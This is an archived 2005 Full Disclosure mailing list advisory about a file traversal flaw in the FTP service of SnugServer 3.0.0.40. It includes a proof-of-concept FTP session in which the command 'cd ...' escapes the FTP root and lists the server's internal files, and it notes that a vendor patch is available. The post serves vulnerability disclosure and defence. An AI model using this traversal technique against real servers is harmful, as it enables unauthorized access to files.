Full Disclosure mailing list archives

Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service

From: <muts () zahav net il>
Date: Thu, 27 Jan 2005 17:37:41 +0200

See Security, Research and Development
www.see-security.com
------------------------------------------------------

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique 
firewall file system where your FTP files can be stored in a 
data file to prevent internal network hacker attacks. Product 
Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in 
SnugServer 3.0.0.40 FTP Service, which allows access to the 
server filesystem, outside of ftproot.

[-]PoC

root@Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
 Welcome FTP User. SnugServer is ready. 
 Name (192.168.1.154:root): muts () default com
331  Password required for muts () default com.
Password:
230  See FTP Server 
Remote system type is You.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
 drw-rw-rw-   1 owner    group            0  Jan 21 03:51 ..
 drw-rw-rw-   1 owner    group            0  Jan 21 02:08 dir
226  Transfer Complete.
ftp> cd ...
200  PORT Command Successful.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ..
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Cert
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Logs
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Requests
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Scripts
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Errors
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Queue
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 www
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Infected
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Temp
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Filtered
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 BaseData
-rw-rw-rw-   1 owner    group 8421376  Jan 21 03:52 SNUG.FDB
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ftp
-rw-rw-rw-   1 owner    group 1861120  Jan 21 03:52 Snug.gbk
-rw-rw-rw-   1 owner    group   32  Jan 21 03:52 yarrow.rnd
226  Transfer Complete.
ftp>
 
[-] Patch

The vendor has been notified, and an update is available at:
 
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service muts (Jan 27)